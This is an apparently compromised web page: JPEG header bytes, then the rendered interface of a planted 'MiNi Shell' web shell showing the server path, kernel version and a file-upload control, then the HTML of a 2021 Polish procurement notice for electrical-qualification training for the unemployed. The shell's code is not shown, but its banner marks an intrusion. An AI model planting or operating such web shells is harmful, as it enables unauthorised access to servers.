JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210812/0014749001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00147490 z dnia 2021-08-12</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa organizacji grupowego szkolenia dla osób bezrobotnych w zakresie: <br/>„Uprawnienia elektroenergetyczne grupa EI” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY URZĄD PRACY W BIŁGORAJU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950031692</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohaterów Monte Cassino 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Biłgoraj</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">84 685 00 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pupbilgoraj.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://pup.bilgoraj.ibip.pl/public/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa organizacji grupowego szkolenia dla osób bezrobotnych w zakresie: <br/>„Uprawnienia elektroenergetyczne grupa EI” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cf6b5d19-fb4f-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00147490</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006226/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Organizacja szkoleń grupowych dla osób bezrobotnych: Magazynier z obsługą wózków jezdniowych, Uprawnienia elektroenergetyczne grupa EI, Księgowość komputerowa w małej firmie z Certyfikatem ECDL (BASE)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn.: „Aktywizacja osób młodych pozostających bez pracy w powiecie biłgorajskim (VI)” finansowanego ze środków Funduszu Pracy w ramach Programu Operacyjnego Wiedza Edukacja Rozwój współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl; zamowienia@pupbilgoraj.pl; https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”. 2. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w „Regulaminie korzystania z systemu miniPortal” dostępnego na stronie:<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz „Warunkach korzystania z elektronicznej platformy<br/>usług administracji publicznej (ePUAP)”. 3. Zasady składania ofert oraz dokumentów składanych wraz<br/>z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania opisane zostały w „Instrukcji<br/>użytkownika”. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w<br/>niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę<br/>akceptuje zasady korzystania z systemu miniPortal wskazane w „Instrukcji użytkownika” i SWZ. 4.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. 5. Za<br/>datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP. SKŁADANIE OFERT 6. Wykonawca składa ofertę za pośrednictwem<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i<br/>udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę<br/>jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. 7. W formularzu<br/>oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie<br/>korespondencja związana z postępowaniem. 8. Ofertę należy sporządzić w języku polskim. 9. Ofertę<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym w formatach danych określonych w przepisach wydanych<br/>na podstawie art. 18 ustawy z dn 17.02.2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (Dz. U. z 2021 r. poz. 670 z późn. zm.), z zastrzeżeniem formatów, o których mowa<br/>w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych. 10.Sposób złożenia<br/>oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie:<br/>https://miniportal.uzp.gov.pl/ 11. Do oferty należy dołączyć oświadczenie o niepodleganiu wykluczeniu,<br/>spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w pkt 8.1 SWZ, w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym<br/>oraz inne dokumenty i oświadczenia, o których mowa w rozdziale 13 SWZ, a następnie zaszyfrować<br/>wraz z plikami stanowiącymi ofertę.12.Oferta może być złożona tylko do upływu terminu składania<br/>ofert. 13. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za<br/>pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP<br/>i udostępnionego również na miniPortalu. Sposób wycofania oferty został opisany w „Instrukcji<br/>użytkownika” dostępnej na miniPortalu 14. Wykonawca po upływie terminu do składania ofert nie może<br/>skutecznie dokonać zmiany ani wycofać złożonej oferty. ciąg dalszy w Sekcji IX Pozostałe informacje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1) administratorem Pani/Pana danych<br/>osobowych jest: Powiatowy Urząd Pracy w Biłgoraju z siedzibą przy ul. Bohaterów Monte Cassino 38,<br/>23 - 400 Biłgoraj, reprezentowany przez Dyrektora PUP. Numer tel.: 84 6850000, fax 84 6861671,<br/>adres email: pupbilgoraj@pupbilgoraj.pl. 2) inspektorem ochrony danych w PUP w Biłgoraju jest Pan<br/>Janusz Małek. Dane kontaktowe: adres siedziby PUP, numer tel.: 84 6850000, fax 84 6861671, email:<br/>iod@pupbilgoraj.pl 3) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu prowadzenia postępowania o udzielenie zamówienia publicznego<br/>prowadzonego na podstawie art. 275 pkt 1 w związku z art 359 pkt 2 ustawy z dnia 18 maja 2021r.<br/>Prawo zamówień publicznych (Dz. U. z 2021r. poz. 1129 z późn. zm.), którego przedmiotem jest<br/>usługa społeczna pn.: „Usługa organizacji grupowego szkolenia dla osób bezrobotnych w zakresie:<br/>„Uprawnienia elektroenergetyczne grupa EI" oraz zawarcia umowy na realizację<br/>zamówienia;4) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp; 5)<br/>dane osobowe Wykonawcy będą przechowywane przez okres niezbędny do realizacji wskazanego w<br/>pkt 3 celu przetwarzania jednak nie krócej niż przez okres wynikający z przepisów ustawy Pzp oraz<br/>obowiązujących w PUP przepisów kancelaryjno – archiwalnych; 6) obowiązek podania przez<br/>Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7) w odniesieniu<br/>do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22 RODO; 8) Wykonawca posiada:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy; b) na<br/>podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników; c)<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; d) prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że<br/>przetwarzanie jego danych osobowych narusza przepisy RODO; 9) Wykonawcy nie przysługuje:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; b) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c) na podstawie art. 21 RODO<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO. 22.2 Jednocześnie Zamawiający<br/>przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane zostaną przekazane zamawiającemu w związku z<br/>prowadzonym postępowaniem i które zamawiający pośrednio pozyska od wykonawcy biorącego udział<br/>w postępowaniu, chyba że ma zastosowanie co najmniej jedno wyłączenie, o których mowa w art. 14<br/>ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OA.2710.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa organizacji grupowego szkolenia dla osób bezrobotnych w zakresie: „Uprawnienia elektroenergetyczne grupa EI” z egzaminem przed komisją kwalifikacyjną powołaną na podstawie ustawy Prawo energetyczne dla 12 osób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na<br/>podstawie następujących kryteriów oceny ofert:<br/>1) całkowity koszt szkolenia (cena) – 60 %,<br/>2) dostosowanie doświadczenia kadry dydaktycznej do zakresu szkolenia - 38%,<br/>3) posiadanie przez instytucję szkoleniową certyfikatu jakości w zakresie usług szkoleniowych – 2%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostosowanie doświadczenia kadry dydaktycznej do zakresu szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">38</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie przez instytucję szkoleniową certyfikatu jakości w zakresie usług szkoleniowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z pkt 6.1 .SWZ:<br/>"6.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu:<br/>6.1.1. zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w w/w zakresie.<br/>6.1.2.uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów;<br/>Warunkiem udziału w postępowaniu jest posiadanie przez wykonawcę aktualnego wpisu do<br/>rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze<br/>względu na siedzibę instytucji szkoleniowej na podstawie art. 20 ust. 1 ustawy z dnia 20 kwietnia<br/>2004r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2021r. poz. 1100 z późn.<br/>zm.).<br/>6.1.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa warunku w w/w zakresie.<br/>6.1.4. zdolności technicznej lub zawodowej:<br/>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, iż:<br/>1) posiada wiedzę i doświadczenie w świadczeniu usług szkoleniowych tj.:<br/>w ciągu ostatnich 3 lat przed upływem terminu składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co<br/>najmniej 3 szkolenia grupowe dla co najmniej 5 osób każde.<br/>2) dysponuje lub będzie dysponować osobami, które będą uczestniczyć<br/>w wykonaniu zamówienia, które w ciągu ostatnich 5 lat przed upływem terminu składania ofert<br/>przeprowadziły co najmniej 2 szkolenia lub bloki tematyczne w zakresie związanym z<br/>wykonywanymi czynnościami w zamówieniu."<br/>Zgodnie z pkt 6.3 . i 6.4. SWZ:<br/>"6.3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej<br/>jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia<br/>do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do<br/>których realizacji te uprawnienia są wymagane (art. 117 ust. 2 ustawy Pzp).<br/>6.4. W odniesieniu do warunków dotyczących<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując<br/>warunek udziału w postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają usługi, do realizacji których te zdolności są wymagane (art. 117 ust. 3 ustawy Pzp). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu o udzielenie<br/>zamówienia, na podstawie art. 108 ust 1 ustawy Pzp, wykonawca zobowiązany jest do złożenia<br/>oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego (patrz pkt 8.1 SWZ). Wzór oświadczenia stanowi załącznik nr 9 do SWZ. Przepis<br/>stosuje się odpowiednio do podmiotów udostępniających zasoby, w przypadku gdy wykonawca polega<br/>na zdolnościach tych podmiotów na zasadach określonych w art. 118 ustawy Pzp.<br/>2. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>w art. 118 ustawy Pzp, przedstawia na wezwanie zamawiającego wraz z oświadczeniem wymienionym<br/>w pkt. 1 (pkt 8.4.2 SWZ), oświadczenie podmiotu udostępniającego zasoby o aktualności informacji<br/>zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw<br/>wykluczenia z postępowania wskazanych przez zamawiającego. Wzór oświadczenia określa załącznik<br/>nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zgodnie z pkt 8.4 .SWZ:<br/>"8.4. Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych<br/>środków dowodowych i oświadczeń (aktualnych na dzień złożenia):<br/>8.4.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) W zakresie wskazanym w pkt 6.1.2. SWZ. Wykonawca potwierdza spełnianie warunku poprzez<br/>złożenie oświadczenia o posiadaniu wpisu do rejestru instytucji szkoleniowych wg załącznika nr 6 do<br/>SWZ. Zamawiający zweryfikuje w Rejestrze Instytucji Szkoleniowych dostępnym na stronie<br/>www.ris.praca.gov.pl czy Wykonawca ubiegający się o realizację zamówienia jest wpisany do rejestru<br/>instytucji szkoleniowych i posiada aktualny wpis.<br/>2) W zakresie wskazanym w pkt 6.1.4 ppkt 1) SWZ Wykonawca zobowiązany będzie do złożenia<br/>wykazu usług wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy. Wykaz<br/>należy przygotować według wzoru określonego w załączniku nr 7 do 